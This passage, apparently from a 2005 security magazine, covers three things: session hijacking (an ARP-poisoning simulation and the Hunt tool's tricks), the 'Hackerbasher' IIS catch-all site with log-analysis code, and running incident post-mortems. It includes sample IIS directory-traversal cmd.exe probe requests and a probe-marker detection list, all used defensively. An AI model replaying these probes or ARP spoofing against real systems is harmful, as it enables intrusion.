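    a.reply(HOST_B_IP, ATTACKER); seen.append(a.resolve(HOST_B_IP))   # attacker re-poisons, unsolicited
    return a, seen

def figure_8_blackhole(accept_unsolicited=True):
    """After a legitimate resolution, an unsolicited reply points Host B at a MAC nobody owns,
    so Host A's frames for Host B (ACK storm included) are switched into the void."""
    a = ArpCache(accept_unsolicited)
    a.request(HOST_B_IP)
    a.reply(HOST_B_IP, HOST_B)
    a.reply(HOST_B_IP, BOGUS)
    return a

def pinned():
    """Static entry (what 'arp -s' configures): the forged reply is logged and ignored."""
    a = ArpCache(accept_unsolicited=True)
    a.static[HOST_B_IP] = HOST_B
    a.reply(HOST_B_IP, ATTACKER)
    return a

if __name__ == "__main__":
    for flag in (True, False):
        cache, seen = figure_7(flag)
        print(f"accept_unsolicited={flag}: resolutions {seen}; alerts {cache.alerts}")
    print("blackhole, trusting cache:", figure_8_blackhole(True).resolve(HOST_B_IP))
    print("blackhole, strict cache:  ", figure_8_blackhole(False).resolve(HOST_B_IP))
    print("pinned:", pinned().resolve(HOST_B_IP), pinned().alerts)
```

The "changed from ... to ..." alert is the signal a monitor on the segment should raise: a MAC address that flips for an IP that has not moved is the footprint of exactly this attack.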

Attackers can also use ARP packet manipulation to quiet TCP ACK storms, which are noisy and easily detected by devices such as intrusion detection system (IDS) sensors (see Figure 8). Session hijacking tools such as Hunt accomplish this by sending unsolicited ARP replies. Most systems will accept these packets and update their ARP tables with whatever information is provided. In our Host A/Host B example, an attacker could send Host A a spoofed ARP reply indicating that Host B's MAC address is something nonexistent (like C0:C0:C0:C0:C0:C0), and send Host B another spoofed ARP reply indicating that Host A's MAC address is also something nonexistent (such as D0:D0:D0:D0:D0:D0). Any ACK packets between Host A and Host B that could cause a TCP ACK storm during a network-level session hijacking attack are sent to invalid MAC addresses and lost.

Figure 8 Stopping a TCP ACK Storm
Host A (MAC AA:AA:AA:AA:AA:AA), Host B (MAC BB:BB:BB:BB:BB:BB), Attacker
Attacker sends Host A an ARP reply that indicates the MAC address to reach Host B is "C0:C0:C0:C0:C0:C0"
Attacker sends Host B an ARP reply that indicates the MAC address to reach Host A is "D0:D0:D0:D0:D0:D0"
ACK storm packets from each host are sent to an invalid MAC address and lost

TCP Resynchronizing

To hide his or her tracks, an attacker who is finished with the session hijacking attack might want to resynchronize the communicating hosts. The problem is that after the attack, the two hosts whose session was hijacked will be at different points in the session. In other words, each host will be expecting different sequence numbers.

For example, the server might think that it is 40 bytes into the session when really the client might have sent only 29 bytes. Thus, the expected sequence numbers on each side will differ. Since sequence numbers move in only a positive direction, it's not possible with TCP stacks to manipulate the server so that its expected sequence number moves downward to match the client's sequence number.

In this situation, the attacker needs some way to move the client's sequence numbers to match the server's. Tools like Hunt try to solve this problem by sending a message to the client. Here is an example (note that the number 13 is used arbitrarily):

msg from root: power failure - try to type 13 chars

Hunt will replace this value with whatever number of bytes the client is required to send to be resynchronized with the server. The hope is that the user will comply. When the user has typed enough characters, Hunt will use more forged ARP reply packets to restore the correct values to the ARP table entries it modified on the client and server to avoid TCP ACK storms.

This technique of resynchronizing client and server TCP stacks is dependent on the user following instructions sent by the Hunt tool, and will probably not work against well-educated users or any protocol other than Telnet or possibly FTP.

Remotely Modifying Routing Tables

As discussed earlier, an attacker who wants to hijack a session at the network level wants to route all communications between a client and server through him or her, making it easy to monitor, modify, and inject data into the session, as in MITM attacks. This boils down to the attacker tricking one of the hosts, usually the client, into routing all its session traffic through the attacker. When an attacker is local to the host whose traffic is being intercepted, one popular way to modify the routing table of the host is to forge ICMP Redirect (type 5) packets and advertise them as the route to take when sending data.

To protect Windows hosts from forged ICMP redirect attacks, set the EnableICMPRedirect value (REG_DWORD) to 0 under the registry key HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters. The same setting is exposed in the Windows security templates as the "MSS: (EnableICMPRedirect)" entry, which lets you push it out by Group Policy rather than editing each host.


Conclusion

Protecting network sessions that carry sensitive and important data such as credit card numbers, bank transactions, and administrative server commands is an important first step at improving the security posture of your organization. By removing an attacker's ability to inject data into those sessions, you raise the security bar and force your adversary to try other, more complex avenues that are less likely to compromise your organization's security.




Marnie Hutcheson

Hackers At Their Own Game With A Hackerbasher Site

AT A GLANCE
• Prevent automated attacks from reaching legitimate Web domains
• Automatically divert attacks into a dead end
• Get a single log that shows all attack traffic

Marnie Hutcheson is president of Ideva, a firm that specializes in Web application design, development, and hosting. She has published a variety of technical papers and books on various computing topics. You can reach her at marnie@ideva.com.


On any given morning, a look through my production Web server's logs will show that my server farm is under a barrage of attacks. Hackers and crackers with automated IP port scanners can swamp a Web site with bogus requests and failed logons.

The sheer volume of this traffic can reduce response times and overload service request logs. Failed logon attempts (sometimes several hundred in a minute) can obliterate legitimate security reporting in the event viewer. Even if the hacker never gains access to anything, your Web site suffers. I use several procedures to minimize the attack surface. But even after hardening the server and putting it behind a firewall, it is still vulnerable to attacks on port 80.

In this article, I will present an easily implemented strategy that uses HTTP 1.1 host headers to divert port 80 attacks away from unsecured public Web sites into a dead end where they can't do damage. My site, called Hackerbasher, stops the automated attack and records the details about the attack along with the IP address used by the attacker. Hackerbasher doesn't require any special software and its only cost is the time it takes to set it up on your server. You also get the added benefit of being able to monitor port 80 attacks in a single log file. See the sidebar "Setting Up Your Hackerbasher" for more information.

As you can see in Figure 1, the Hackerbasher log contains evidence of a typical automated attack. Several sites on the server are being attacked several times per second by the hacker at xx.xxx.71.170. The hacker is trying to find cmd.exe along several different paths by requesting that it execute with the command line /c+dir+c:\ (these are the IIS directory-traversal probes that worms such as Nimda automated). Such an attack typically lasts only a few seconds. If the command fails, the hacker automation increments the IP address and sends the request to the next unlucky server. If the command succeeds on any of the IP addresses in the server, the hacker will be at the "C:\" prompt, ready to damage or destroy the server, steal valuable information, or whatever he or she wants. My firewall doesn't keep out this kind of attack.

Many of these attackers appear to be crackers, thrill seekers who simply want to break into something. Crackers usually sniff around for the obvious stuff such as unsecured databases and leftover developer sample files. Obviously, some attackers are on a mission to get in and do damage.

So how do we track down these people? One way is to use a honeypot: an information system resource intended to receive unauthorized or illicit use. The Honeynet Project (project.honeynet.org) was set up so that the good guys can watch and analyze what hackers do. The Honeynet Project reports that the average life expectancy of a honeypot on the Internet is 72 hours. The shortest known manual compromise time was 15 minutes, but a worm got the job done in 15 seconds.

My solution is like a honeypot in that Hackerbasher has no production value. It is set squarely in the path of automated IP:80 attacks and, through its logs, it lets me study what the hackers are trying to do.

Hackerbasher consists of one locked empty directory containing absolutely nothing: no home page, no virtual connections, no apps, and no server extensions.


How It Works 


I got the idea for Hackerbasher one morning back in 2002 while I was wading through endless IIS logs tracking a worm. I noticed that the hackers weren’t attacking the sites by their domain names but by their IP addresses. I was sure there was an automated tool out there systematically trolling through my IP pool looking for something listening on port 80. So, I thought, why not route all the IP:80 requests to a dead end in cyberspace? I then used host headers to do exactly that and called it Hackerbasher.

Legitimate users don’t normally go to a Web site by typing an IP address, but automated tools do. Humans use the domain name. The log files from Hackerbasher for the past two years prove this. The only nonhacker traffic to Hackerbasher has been the occasional request for an invalid URL or an unresponsive domain. I’ll explain why Hackerbasher gets these requests later.




Setting Up Your Hackerbasher

1. Open the Microsoft Management Console (MMC) with the IIS snap-in.

2. Assign one host header (or several) to each Web site there so that no virtual server is mapped to an IP address on port 80 without a host header name. Unless you have a good reason not to do so, make sure that no Web server is using “All Unassigned” IP addresses (see Figure 3).

3. Create a Web site that points to an empty directory (preferably not on the C: drive). You can use the standard defaults in the site creation wizard and call the site whatever you want. Remember, it doesn’t need a registered domain name since it won’t be listed in any DNS servers. Also, don’t install any server extensions like FrontPage® or SharePoint®.

4. Once you have created the site, right-click on it and select Properties. Click the Directory Security tab and select Integrated Windows Authentication, then click OK. Be sure to uncheck Anonymous Access and Basic Authentication as shown in Figure A.

5. On the Web Site tab, click the Advanced button. Use the Add button on the Advanced Multiple Web Site Configuration window to select each IP address that you want to assign to Hackerbasher. For me, this is all the IP addresses that are visible to the public.

6. Apply your changes and recheck your list to make sure that all your IP addresses are on it. If an IP address is already assigned to some other Web site, the MMC will give you an error message telling you there is a conflict. All you need to do is go back through the other Web site Identities and find the one(s) using an IP address on port 80 without a host header.

7. On the Web Site tab, make sure that Enable Logging is checked; I use the W3C Extended Log File Format. Next, click the Properties button next to Active log Format and the Extended Logging Properties window will open.

8. On the General Properties tab, select the log time period you prefer (I use Daily). Select the Extended Properties tab and then select the extended properties that you want to have appear in your log file. I check all of the extended properties, except Process Accounting. Note that the W3SVC number will be the name of the folder where the IIS logs from your Hackerbasher site will be stored.

Figure A Hackerbasher Security Settings (the Authentication Methods dialog for the Hackerbasher site: Anonymous access and Basic authentication unchecked, Integrated Windows authentication checked)


Winter 2005 45 


Figure 1 A Hackerbasher Log (W3C extended log opened in Excel; columns time, c-ip, s-ip, s-port, cs-method, cs-uri-stem, cs-uri-query, sc-status; the rows are HEAD requests for cmd.exe through /scripts/, /msadc/ and /winnt/system32/ paths with the query /c+dir+c:\, several per second against different server addresses, each answered with sc-status 401)


On all my servers that are running Microsoft Windows, Hackerbasher is secured with Windows NT Challenge/Response authentication, or NTLM. It’s not Kerberos, but it works on older servers, including those that are not running Active Directory, so it’s the lowest common denominator. Every request to this site is presented with the Windows Integrated Authentication challenge. The automated attack fails to authenticate and the server returns a 401 error, effectively ending the attack (see the sc-status column in Figures 1 and 2). The Hackerbasher logs show that attacks launched against IP:80 don’t expect to have to try passwords, so the automated attack software increments the IP address and tries again, as you can see in Figure 2. The hacker at IP address xx.xxx.119.16 attacks yy.yyy.yyy.21, 22, 23, up to 29 from 6:31:36 until 6:31:47. That’s 17 attacks in 9 seconds! When the IP address increments beyond the IP addresses in my server, someone else will be under attack.

Figure 2 Hackerbasher IIS Log from Failed Attacks (W3C extended log opened in Excel; columns date, time, c-ip, s-computername, s-ip, s-port, cs-method, cs-uri-stem, cs-uri-query, sc-status; every row is an OPTIONS / request from XX.XXX.119.16 to one of YY.YYY.YY.18 through .29 between 6:31:36 and 6:31:47 on 6/26/2004, each answered with sc-status 401)
Even if someone were to provide valid logon credentials to the Hackerbasher site—even if they are a sysadmin for the domain—they will get an “HTTP Error 403—Forbidden” message after they pass the Challenge/Response authentication because there is no home page.

I mapped all the root IP:80 addresses to Hackerbasher and set up host headers for all my other domains. The hackers can “bash” against the site as long as they like, but all they get from my server is a 401 (Unauthorized, Access Denied) failure message, shown in the sc-status column in Figure 1. Meanwhile, my customers’ sites purr along without this traffic threatening their sites and filling their logs.

Putting this security procedure in place cost nothing except the time it took to make sure all my sites had their host headers in order. For years I have used host headers to get the most out of my limited pool of IP addresses, so setting this up wasn’t much work. All I had to do was collect the root IPs, assign them to Hackerbasher, and make sure my customers’ host headers were in order.

Most of my sites have at least two host 
headers defined, one with the “www” and 
one without, for example www.testerspara- 
dise.com and testersparadise.com. Some 
Web sites have multiple domain names 
pointing to them and multiple extensions; 
.com, .org, and so on. Notice in Figure 3 
that there is no identity defined that has an 
IP address without a host header name. 


A Single Log File 

The log excerpt you saw in Figure 1 shows 
only one type of attack, but one that is be- 
ing used against many IP:80 addresses on 
this server. (Reading your logs is always im- 
portant, as you'll read in the sidebar “Hard- 
ening Your Web Server.”) You don’t usually 
get a single log file that shows how the 
hacker attack is moving through the IP ad- 
dresses on a server. Normally the record of 
the attacks would be spread across multiple 
IIS site logs; an administrator would have 
to look through each one to piece together 
this information. This approach separates the legitimate users who failed to log onto a host header domain (recorded in the log from that domain) from the crackers and hackers. It also adds a layer of security to my hosted sites by diverting the bogus traffic to a site that can give them what they deserve: an authentication prompt that will never let them in.

In the course of a normal day, there will be several different types of attacks going on all at the same time. Before I put the Hackerbasher solution in place and collected all this information into one log, it was impossible to gauge the size and the seriousness of this type of attack, since the details were buried in several IIS site logs.

Figure 4 shows a series of failed logon 
attempts in the Windows Event Viewer. 
These failures are mostly hackers at- 
tempting to get into e-commerce, intra- 
net, disaster recovery, and similar secured 
sites. They are usually my first clue that a 
serious assault may be underway against 
some secured resource, like a database 
or an e-store. 

If you only have one secured Web site 
running in a server when you see a series 
of security failures like this, you can check 
the IIS log and determine if it is under 
attack and what the attackers are trying 
to do. You can also determine if the at- 
tack is being directed at some other re- 
source, such as an FTP server or an SMTP 
server. If you are running a hosting ser- 
vice with lots of secured sites, however, 
the evidence can be spread across too 
many site logs to track down. 

It really frustrated me that I couldn't get 
an accurate idea of how many attacks were 
going on and what type they were without 
spending days going through hundreds of 
logs. For example, I could see the logon fail- 
ures in my event log, but I couldn't close the 
loop between a particular logon failure in 
the event log and a specific failed server re- 
quest among all the secured virtual servers 
running on the computer. Figure 2 shows the Hackerbasher IIS log for this same time period. Notice that every request was sc-status 401 (Access Denied). I still can’t do a precise correlation with IIS 5.0, but at least with Hackerbasher in place, I can see what’s going on across all the IP addresses in the box. If my event logs don’t match my Hackerbasher log, it’s time to start looking for attacks on legitimate secured sites.

Figure 3 Host Header Definitions and IP Mapping in the MMC (Web Site Identification for a customer site with the Advanced Multiple Web Site Configuration dialog open: each identity lists an IP address, TCP port 80, and a Host Header Name such as www.testersparadise.com or mweb.testersparadise.com; no identity has an IP address without a host header name)
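The two checks the article describes, reading one consolidated log to watch an attacker move through the server’s IP addresses and comparing Security-log failure audits against the Hackerbasher log, can be scripted. What follows is an added example written for this edit, not code from the article or from IIS: it parses the W3C extended log format the sidebar tells you to enable, classifies the requests shown in Figures 1 and 2, flags clients that sweep many server addresses inside a short window, counts anything that was not answered with a 401, and lists failure audits with no Hackerbasher request near them in time. The log lines, audit entries and addresses are constructed samples (10.0.x.x, 192.0.2.x and 198.51.100.x are documentation placeholders standing in for the article’s xx.xxx.119.16 and yy.yyy.yy.21 through .29).

```python
"""Added example: summarize a Hackerbasher-style IIS W3C extended log and
correlate it with Security-log failure audits by time stamp."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the article), modelled on Figures 1 and 2:
# one client walking the server's address pool with OPTIONS /, another probing
# for cmd.exe, and one browser request. All addresses are placeholders.
SAMPLE_IIS_LOG = """\
#Fields: date time c-ip s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2004-06-26 06:31:36 10.0.119.16 192.0.2.26 80 OPTIONS / - 401 -
2004-06-26 06:31:38 10.0.119.16 192.0.2.24 80 OPTIONS / - 401 -
2004-06-26 06:31:38 10.0.119.16 192.0.2.23 80 OPTIONS / - 401 -
2004-06-26 06:31:39 10.0.119.16 192.0.2.19 80 OPTIONS / - 401 -
2004-06-26 06:31:41 10.0.119.16 192.0.2.21 80 OPTIONS / - 401 -
2004-06-26 06:31:43 10.0.119.16 192.0.2.29 80 OPTIONS / - 401 -
2004-06-26 06:31:47 10.0.119.16 192.0.2.27 80 OPTIONS / - 401 -
2004-06-26 10:02:19 10.0.71.47 192.0.2.25 80 HEAD /scripts/..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\\ 401 -
2004-06-26 10:02:22 10.0.71.47 192.0.2.25 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\\ 401 -
2004-06-26 12:15:00 198.51.100.8 192.0.2.21 80 GET / - 401 Mozilla/4.0
"""

# Constructed failure audits modelled on Figure 4: (time, category).
SAMPLE_AUDITS = [
    ("2004-06-26 06:31:36", "Account Logon"),
    ("2004-06-26 06:31:38", "Logon/Logoff"),
    ("2004-06-26 06:31:41", "Account Logon"),
    ("2004-06-26 06:31:47", "Account Logon"),
    ("2004-06-26 06:40:02", "Account Logon"),  # no Hackerbasher request near this one
]

PROBE_MARKERS = ("cmd.exe", "..%5c", "../", "/msadc/", "/scripts/")

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        if fields is None:
            raise ValueError("request line before #Fields directive")
        values = raw.split(" ")
        if len(values) != len(fields):
            raise ValueError("field count mismatch: %r" % raw)
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec

def classify(rec):
    """'probe' for cmd.exe/traversal requests (Figure 1), 'method-scan' for a bare
    OPTIONS or HEAD of the root (Figure 2), else 'other'."""
    uri = (rec["cs-uri-stem"] + "?" + rec["cs-uri-query"]).lower()
    if any(m in uri for m in PROBE_MARKERS):
        return "probe"
    if rec["cs-method"] in ("OPTIONS", "HEAD") and rec["cs-uri-stem"] == "/":
        return "method-scan"
    return "other"

def find_sweeps(records, min_targets=5, window=timedelta(seconds=30)):
    """Clients that hit at least min_targets distinct server addresses inside one
    window: the 'tool walking the IP pool' pattern that is only visible when
    every IP:80 address logs to the same site. Returns {c-ip: (targets, first, last)}."""
    by_client = defaultdict(list)
    for r in records:
        by_client[r["c-ip"]].append(r)
    sweeps = {}
    for cip, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):          # sliding window over sorted times
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            targets = {r["s-ip"] for r in recs[start:end + 1]}
            if len(targets) >= min_targets and len(targets) > sweeps.get(cip, (0,))[0]:
                sweeps[cip] = (len(targets), recs[start]["ts"], recs[end]["ts"])
    return sweeps

def summarize(text):
    """Counts per request class, sweeping clients, and how many requests got
    anything other than 401: the dead-end site should never serve one."""
    records = list(parse_w3c(text))
    kinds = defaultdict(int)
    for r in records:
        kinds[classify(r)] += 1
    return {"requests": len(records), "kinds": dict(kinds),
            "sweeps": find_sweeps(records),
            "non_401": sum(1 for r in records if r["sc-status"] != "401")}

def unmatched_audits(records, audits, slack=timedelta(seconds=2)):
    """Failure audits with no Hackerbasher 401 within `slack` seconds: the ones
    to chase, since they may be aimed at a real secured site instead."""
    times = [r["ts"] for r in records if r["sc-status"] == "401"]
    out = []
    for when, category in audits:
        t = datetime.strptime(when, "%Y-%m-%d %H:%M:%S")
        if not any(abs(t - x) <= slack for x in times):
            out.append((when, category))
    return out
```

A non-zero non_401 count is the first thing to look at: the dead-end site should answer with nothing but 401 (or 403 after a successful logon), so any other status means anonymous access or a home page has crept back in. Audits that do not line up with a Hackerbasher request are the ones the article says to chase, because they may belong to an attack on a real secured site.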

Hackerbasher has proven to be a gold- 
mine in several ways. In Figures 1 and 2, 
each attack is failing, as you can see in the 
sc-status column. All these IP addresses are 
secured by Integrated Windows authenti- 
cation. The hacker tool simply quits attack- 
ing a particular IP address when it receives 
a 401 from the server. No matter what other 
defenses are in place, the hack is failing be- 
cause it cannot pass a logon request. 




Early Detection 

On an average day, Hackerbasher is sub- 
jected to thousands of attacks from IP ad- 
dresses all over the world. I had no idea just 
how many attacks were going on per day 
until I set up Hackerbasher and routed all 
of the IP attacks to it. Over the past 24 
months, Hackerbasher has successfully cap- 
tured several different types of attempted 
hacks in its log files, alerting me to new 
types of attacks as soon as they appear. 
These are attacks that could succeed against 


Figure 4 Failed Logons from an Automated Attack (Event Viewer, Security Log: Failure Audit entries in the Account Logon and Logon/Logoff categories, user SYSTEM, 6/26/2004 6:31:29 AM through 6:31:46 AM)


an unsecured public site, underscoring the 
importance of having your server patches 
in place when a new attack finds it. 


How Host Headers Work 


In IIS 3.0, a machine could be assigned multiple static IP addresses, and it could have a virtual Web server running on port 80 of each IP address, and that’s all. Each Web site with a domain name had to have a dedicated IP address.

Domain Name Servers look up the IP address associated with a domain name. DNS assumes port 80 for all domain names, so a Web domain defined with a port other than 80 would not appear in any DNS entry. With HTTP 1.0, this meant that each IP address in the server was dedicated to a single domain.

Host headers were added in HTTP 1.1. IIS 4.0 and later support the HTTP 1.1 host header definition. Host headers mean there are three parts to a Web server’s identity in the Web server: the IP address, the port number, and the host header. Using host headers, you can specify the address the old way, using the IP address and port number, or you can assign a host header to an IP address that will use port 80. Several virtual servers (Web sites on the same machine) can share two of the three parts, but the third part must be unique to the particular virtual server.


Host headers allow me to put several hundred small domains on one IIS server using only a handful of IP addresses. Even customers who have their own dedicated IP addresses use multiple host headers. Several different servers can run on the same machine with the same IP address. For example, the HTTP and FTP servers often share an IP address for a specific domain, but they must each have a dedicated port on the IP address that they can communicate through. Since FTP servers listen on port 21 by default, the IP address would then be 123.123.234.234:80 for the HTTP server and 123.123.234.234:21 for the FTP server. These servers can listen on any port defined for them, but most domains rely on DNS for domain name resolution and since DNS uses port 80, they will also.

Having multiple Web sites defined on a single IP address, with each one listening on a different port, is called IP overloading. This is useful when you own only one IP address. It is also used to obfuscate the location of some sites (like the server administrative site), and allows the server to programmatically redirect traffic to a Web-based application on the server. A user accessing a site defined in this way must specify the full IP address followed by a colon and the port number.

The host header is the domain name that is requested by the user in the location field of their browser. Starting in HTTP 1.1, the browser puts the domain name portion of the URL into the Host Header Definition part of the HTTP request header. Using host headers, I can define multiple domain names for the same site (see Figure 3).


Behind the Scenes

By default, an HTTP server will listen on all unassigned IP addresses on the server using port 80. If you don’t define any specific IP address, your server will be available on all the IP addresses on the server; this is a very poor security practice but it is commonly used for SMTP and FTP servers. The server that has an IP address assigned with port 80 and no host header is the primary, or root, server for that address on that port. When a request is received from a browser, the server tries to route the request to its intended site (virtual server) using the IP address, the port, and the host header name. If the host referenced in the host header is unavailable or doesn’t exist, or if the page requested does not exist, the request is routed to the primary Web server of that IP:80 address. Hackerbasher is my primary Web server for all of the IP addresses on port 80. Figure 5 shows the host header mappings for Hackerbasher. Just as there are no site identities without a host header on the Web site, Hackerbasher is the only Web site with no host headers defined. Hackerbasher receives all the requests for missing pages and defunct or non-functioning domains. This is often my first notification that a customer’s Web site is unresponsive, and it is also handy to be able to let my customers know when they have missing pages.

If the request comes from an HTTP 1.0 browser, hacker tool, or port scanner, and it does not contain a host header, the primary server (Hackerbasher) responds with an authentication challenge. Someone who expected to see testersparadise.com on the banner of the page might get a response from Hackerbasher instead.

A legitimate request from an HTTP 1.0 client will be routed to Hackerbasher because the browser request will contain only the IP address, not the host header name. Even back in 2003, though, my site logs showed that less than one percent of legitimate client traffic was using HTTP 1.0. So far, I haven’t had a single user complain that they couldn’t get to a Web site, and my customers are pleased to have the hacker attacks diverted away from their sites.

With Hackerbasher, a hacker will have to attack a production Web site through its domain name. Unfortunately, a small proportion of hacks I’ve seen do attack sites via their domain names. One example of this is the mysterious Microsoft-WebDAV-MiniRedir/5.1.2600 client which appears as the cs(User-Agent) in both automated attacks and in suspicious requests in production server logs that appear to be driven manually. The original signature is associated with an unchecked buffer issue (see Microsoft Knowledge Base article 815021 at support.microsoft.com/?id=815021). This client sends requests to the server using WebDAV methods.

Figure 5 Host Header Mappings for Hackerbasher (Web Site tab of the hackerbasher site properties, with the Advanced Multiple Web Site Configuration dialog showing one identity per public IP address on TCP port 80 and no Host Header Name on any of them)
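To make the routing rule in “How Host Headers Work” and “Behind the Scenes” concrete, here is an added example written for this edit, not IIS code or the article’s own: a small model of the site table that picks a site by (IP address, TCP port, host header), refuses the duplicate identity the MMC rejects in the sidebar’s step 6, falls back to the host-header-less primary site when the Host header is missing or unknown, and audits the table for any port 80 identity without a host header that does not belong to the catch-all. The site names and the 192.0.2.x addresses are constructed; testersparadise.com is the domain the article uses. Treating a specific address as taking precedence over “All Unassigned” is an assumption of the model.

```python
"""Added example: how IIS chooses a site from (IP address, TCP port, host header)
and where a request with no, or an unknown, host header ends up."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Identity:
    ip: str      # "*" stands for the MMC's "All Unassigned"
    port: int
    host: str    # "" means no Host Header Name


@dataclass
class Site:
    name: str
    identities: list


class SiteTable:
    def __init__(self):
        self.sites = []

    def add(self, site):
        # The MMC refuses a duplicate identity: two sites may share two of the
        # three parts, never all three (the conflict error in the sidebar's step 6).
        taken = {i for s in self.sites for i in s.identities}
        for ident in site.identities:
            if ident in taken:
                raise ValueError(f"{site.name}: identity {ident} already in use")
        self.sites.append(site)

    def _find(self, ip, port, host):
        for want_ip in (ip, "*"):   # assumption: a specific address beats All Unassigned
            for s in self.sites:
                if Identity(want_ip, port, host) in s.identities:
                    return s
        return None

    def route(self, ip, port, host_header):
        """Site that serves a request arriving on ip:port. An exact
        (ip, port, host) match wins; a missing or unknown Host header falls to
        the primary (host-header-less) site for that address, as the article says."""
        host = (host_header or "").lower().split(":")[0]
        site = self._find(ip, port, host) if host else None
        return site or self._find(ip, port, "")


def build_example():
    """Constructed layout: customer sites behind host headers on one shared
    address, and the catch-all bound to every public address with no host header."""
    t = SiteTable()
    t.add(Site("testersparadise", [Identity("192.0.2.21", 80, "www.testersparadise.com"),
                                   Identity("192.0.2.21", 80, "testersparadise.com")]))
    t.add(Site("mweb", [Identity("192.0.2.21", 80, "mweb.testersparadise.com")]))
    t.add(Site("hackerbasher", [Identity(ip, 80, "") for ip in
                                ("192.0.2.21", "192.0.2.22", "192.0.2.23")]))
    return t


def bare_port80_identities(table, catch_all):
    """Audit for the sidebar's second step: every ip:80 identity without a host
    header must belong to the catch-all site, or that address is a live target."""
    return [(s.name, i.ip) for s in table.sites if s.name != catch_all
            for i in s.identities if i.port == 80 and i.host == ""]
```

Running `build_example().route("192.0.2.21", 80, None)` models an HTTP 1.0 client or a tool that addresses the server by IP: it lands on the catch-all, while the same address with a Host header of www.testersparadise.com reaches the customer site. `bare_port80_identities` is the check to run after any change in the MMC.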


Hacking: Fight Back

The Day After: Your First Response To A Security Breach

Kelly J. Cooper

AT A GLANCE

• Defining a post-mortem
• Types of incidents to submit to a post-mortem review
• Organizing the post-mortem
• Managing and facilitating the meeting
• Topics to cover
• Results and follow-ups
• Integration of newfound knowledge into your company

Kelly J. Cooper is a CISSP with nine years experience in the Internet Service Provider business, specializing in operations security and incident response. She is a founding member of The CooperCain Group, Inc. (www.coopercain.com).


The security incident is over. The techs have all gone home and are snug in their beds, dreaming of flawless code trees and buffer-overflow repellent. Upper management has done all the damage control they can. Everyone’s shifting back into their normal activities and schedules. Everyone, that is, except you. What can you do to prevent this from ever happening again?

The best way to understand how a security incident happened is to conduct a post mortem. Incidents can range from an internal configuration error that resulted in system downtime, all the way up through an attack on your company, or even a natural disaster that impacted your company’s physical location. Any event that didn’t go as well as you hoped, or any set of processes that need to be checked, is a perfect candidate for a post mortem.

A post mortem is a review of what happened; a good post mortem delves into the who, what, how, when, and why of the incident. Even if the incident was clearly documented at the time, you’re still going to need to review how things could have gone better in order to improve your processes, tools, and training for the future. These improvements may not prevent all future attacks, but they will allow you to prepare your business for the next incident.

Scheduling

You need to schedule your post mortem as soon as possible after the incident. Give everyone the opportunity to recover first (especially if people need to catch up on sleep), but don’t wait too long. Get everyone who was actively involved in the incident, or at least a representative from each person’s group, into a room. You may not be able to schedule time with any upper-level executives who participated, but you can touch base with them later. In fact, their presence can hinder an open dialogue, so carbon-copy them on the invite, but don’t require their presence.


Materials 

Have all participants bring whatever 
notes they may have made. If you have a 
trouble ticket or a timeline or any kind of 
documentation of the incident, print it out 
and provide copies to everyone. Be sure to 
mark the printouts as confidential. At the 
beginning of the meeting, tell people either 
to hand them back at the conclusion of the 
meeting or keep the materials in a locked 
drawer. Many people would rather hand the 
papers back. 

Make the confidentiality issue clear at the beginning of the meeting so that any notes the participants might take for themselves aren’t written on the printout that they then decide they want to hand back. After the meeting, shred any returned documentation. You don’t want dumpster divers getting their hands on the details of your security problems. If you don’t have a shredder, buy one. You’ll be surprised by how many people will use shredders once they’re available to them.


Agenda 

Post mortems can be extremely emotional. There’s a tendency to fling blame around the table and around the company. Your job is to minimize the emotional outbursts by steering the meeting so that everyone can draw as much useful information as possible. You may need to discuss an amnesty agreement with the group, where you trade a promise of no firings in exchange for honesty. This may sound impractical in some work environments, but it should be seriously considered. You should also think about basing a policy like this on various whistleblower policies and legislation.

The first thing to consider when design- 
ing your agenda is the structure. The 
easiest and the simplest to follow is chro- 
nological: what happened first, next, and 
last? Who did what and when? How long 
between the first and second event? 

A structured agenda is useful for bring- 
ing people back on topic when they start to 
go off on tangents. Of course, remember 


that nothing ever goes according to plan. Leave room for complex discussions and be willing to follow up with specific individuals outside of the meeting in order to put a tangent aside, at least temporarily.

As the meeting coordinator, you also have your own agenda. Aside from whatever political pressure you may be under, you also have a responsibility to compile data that will allow your company to be better prepared for the next incident. You may have to create an incident response process from scratch, including training and documentation. Look at what worked and what didn’t throughout the post mortem as the basis for your process. If an incident handling process already exists, look for areas where education or improvements are needed.


Starting Your Analysis

First, you have to get the meeting started. The sidebar “Five Starter Questions” can help kick off the discussion.

If there is no timeline, you’ll probably have to piece this material together from time stamps on trouble ticket entries and e-mail messages. If none of this material is available in the meeting, discuss the generalities and try to establish specifics after the meeting is over. Make a note for the future that creating a timeline and fully documenting the incident should be part of the incident response process.

Once you’ve determined when and how the issue was recognized as a security incident, you may be able to parlay that information into some sort of early warning system and teach the rest of the staff to recognize the symptoms.

For instance, in the early days of Denial of Service (DoS) attacks, the monitoring centers of ISPs noticed an upswing in outages due to sudden bandwidth saturation. Most were due to one or two types of DoS attacks. Once this was recognized, all operators were trained to look for a DoS attack in the course of their normal investigation of an outage or reported problem. As different attacks evolved, the symptoms of each were broken down and provided to the operators. This became an early warning system that often allowed ISPs to notice that customers were under attack before the customers themselves were aware of the escalating problem.

Discussing the Incident

Once you have a good idea of what happened and how it was recognized, assess the quality of the response by asking some of the questions in the “Post-Mortem Discussion Points” sidebar.

Post-Mortem Discussion Points

• Could the problem have been identified faster?
• Could you have realized it was a security incident sooner?
• Could you have stopped the problem earlier?
• What would have helped speed up any of these processes?
• Are you lacking a run book? A process? A tool? The right skill set? The right people on-call?
• Do you have sufficient resources to handle these attacks? Do you have enough people to look at the system logs, the firewall logs, and Intrusion Detection System (IDS) reports?
• Are you using software to analyze these logs and pull out relevant data to minimize the mind-crushing boredom of going through each by hand?

